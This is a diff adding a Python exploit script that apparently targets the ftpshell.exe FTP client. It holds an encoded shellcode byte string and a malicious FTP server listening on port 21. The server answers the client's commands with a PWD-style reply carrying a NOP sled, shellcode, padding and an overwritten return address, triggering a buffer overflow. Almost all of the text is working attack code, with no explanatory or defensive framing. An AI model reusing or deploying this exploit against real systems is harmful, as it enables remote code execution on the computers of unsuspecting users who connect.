+"\x3b\xd8\x73\x6d\x72\xc2\x90\x48\xcc\x79\x62\x26\xcf\xab\xba"
+"\xc7\x7c\x92\x72\x3a\x7c\xd3\xb5\xa5\x0b\x2d\xc6\x58\x0c\xea"
+"\xb4\x86\x99\xe8\x1f\x4c\x39\xd4\x9e\x81\xdc\x9f\xad\x6e\xaa"
+"\xc7\xb1\x71\x7f\x7c\xcd\xfa\x7e\x52\x47\xb8\xa4\x76\x03\x1a"
+"\xc4\x2f\xe9\xcd\xf9\x2f\x52\xb1\x5f\x24\x7f\xa6\xed\x67\xe8"
+"\x0b\xdc\x97\xe8\x03\x57\xe4\xda\x8c\xc3\x62\x57\x44\xca\x75"
+"\x98\x7f\xaa\xe9\x67\x80\xcb\x20\xac\xd4\x9b\x5a\x05\x55\x70"
+"\x9a\xaa\x80\xd7\xca\x04\x7b\x98\xba\xe4\x2b\x70\xd0\xea\x14"
+"\x60\xdb\x20\x3d\x0b\x26\xa3\x82\x64\xee\xb3\x6b\x77\xee\xa2"
+"\x37\xfe\x08\xae\xd7\x56\x83\x47\x41\xf3\x5f\xf9\x8e\x29\x1a"
+"\x39\x04\xde\xdb\xf4\xed\xab\xcf\x61\x1e\xe6\xad\x24\x21\xdc"
+"\xd9\xab\xb0\xbb\x19\xa5\xa8\x13\x4e\xe2\x1f\x6a\x1a\x1e\x39"
+"\xc4\x38\xe3\xdf\x2f\xf8\x38\x1c\xb1\x01\xcc\x18\x95\x11\x08"
+"\xa0\x91\x45\xc4\xf7\x4f\x33\xa2\xa1\x21\xed\x7c\x1d\xe8\x79"
+"\xf8\x6d\x2b\xff\x05\xb8\xdd\x1f\xb7\x15\x98\x20\x78\xf2\x2c"
+"\x59\x64\x62\xd2\xb0\x2c\x92\x99\x98\x05\x3b\x44\x49\x14\x26"
+"\x77\xa4\x5b\x5f\xf4\x4c\x24\xa4\xe4\x25\x21\xe0\xa2\xd6\x5b"
+"\x79\x47\xd8\xc8\x7a\x42")
+
+port = 21
+
+try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.bind(("0.0.0.0", port))
+        s.listen(5)
+        print("[i] FTP server started on port: "+str(port)+"\r\n")
+except:
+        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
+
+
+
+# 004b95dc in ftpshell.exe PUSH ESI ; RETN
+eip = "\xdc\x95\x4b"
+nops = "\x90"*8 
+junk = "A"*(400-len(nops)-len(shell))
+buffer = nops + shell + junk + eip
+
+while True:
+    conn, addr = s.accept()
+    conn.send('220 Welcome to your unfriendly FTP server\r\n')
+    print(conn.recv(1024))
+    conn.send("331 OK\r\n")
+    print(conn.recv(1024))
+    conn.send('230 OK\r\n')
+    print(conn.recv(1024))
+    conn.send('220 "'+buffer+'" is current directory\r\n')